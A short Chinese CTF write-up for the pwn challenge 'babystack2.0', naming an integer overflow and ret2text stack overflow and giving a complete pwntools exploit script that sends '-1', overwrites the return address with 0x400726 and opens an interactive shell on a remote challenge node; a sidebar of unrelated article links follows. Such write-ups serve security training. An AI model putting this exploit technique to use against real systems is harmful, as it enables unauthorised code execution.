babystack2.0-入土为安的第十六天

简介: babystack2.0-入土为安的第十六天

checksec pwn

整数溢出

ret2text

栈溢出

这行代码等待服务器发送包含 'your name:' 的提示,然后发送字符串 '-1'。这通常用于触发程序接收用户名的部分。

这行代码在收到包含 "name?" 的提示后,发送前面构造的载荷 payload。这通常用来触发某种缓冲区溢出或其他漏洞,进而将控制权转移到你指定的地址(0x400726

from pwn import*
p=remote("node4.anna.nssctf.cn",28324)
p.sendlineafter('your name:',b'-1')
payload=b'b'*(0x10+8)+p64(0x400726)
p.sendlineafter("name?",payload)
p.interactive()

目录
相关文章
|
安全 网络协议 Shell
学习干货|实战某次行业攻防应急响应
学习干货|实战某次行业攻防应急响应
349 4
NSS [SWPUCTF 2021 新生赛]pop
NSS [SWPUCTF 2021 新生赛]pop
195 0
|
人工智能 前端开发 云计算
本地搭建AI服务器
本地搭建AI服务器
1186 1
|
关系型数据库 数据库 PostgreSQL
使用pg_resetxlog修复PostgreSQL控制文件的方法
PostgreSQL 控制文件在$PGDATA/global目录下名为pg_control. 控制文件中记录了以下三部分信息 : 1. initdb时生成的静态信息 : pg_control version number: 922 C
12200 0
|
Java API 容器
常见面试题(jdk1.8的新特性(高薪常问))
jdk1.8的新特性(高薪常问)
661 0
|
存储 监控 安全
某小学AK,SK泄露导致横向到云主机控制台
本文是一篇关于网络安全的漏洞分析报告,首先声明所有漏洞已修复,并警告读者不得用于非法活动,文章是关于云服务安全的,分享了一个实际案例,其中一个小学的云服务Access Key ID和Secret Access Key被泄露,导致攻击者能够接管云主机控制台。文章强调了Access Key和Secret Access Key的重要性,它们是验证用户身份和保证服务安全的关键,不应暴露给未经授权的人员。一旦泄露,攻击者可能进行数据泄露、篡改或删除操作,甚至控制整个云基础设施。作者提供了资产证明、漏洞利用过程和修复及预防措施,提醒读者加强云服务安全管理和监控。
|
安全 关系型数据库 MySQL
PHPInfo()信息泄漏——综合利用提权
PHPInfo()信息泄漏——综合利用提权
1786 0
PHPInfo()信息泄漏——综合利用提权
【攻防世界】easyphp(PHP代码审计)
【攻防世界】easyphp(PHP代码审计)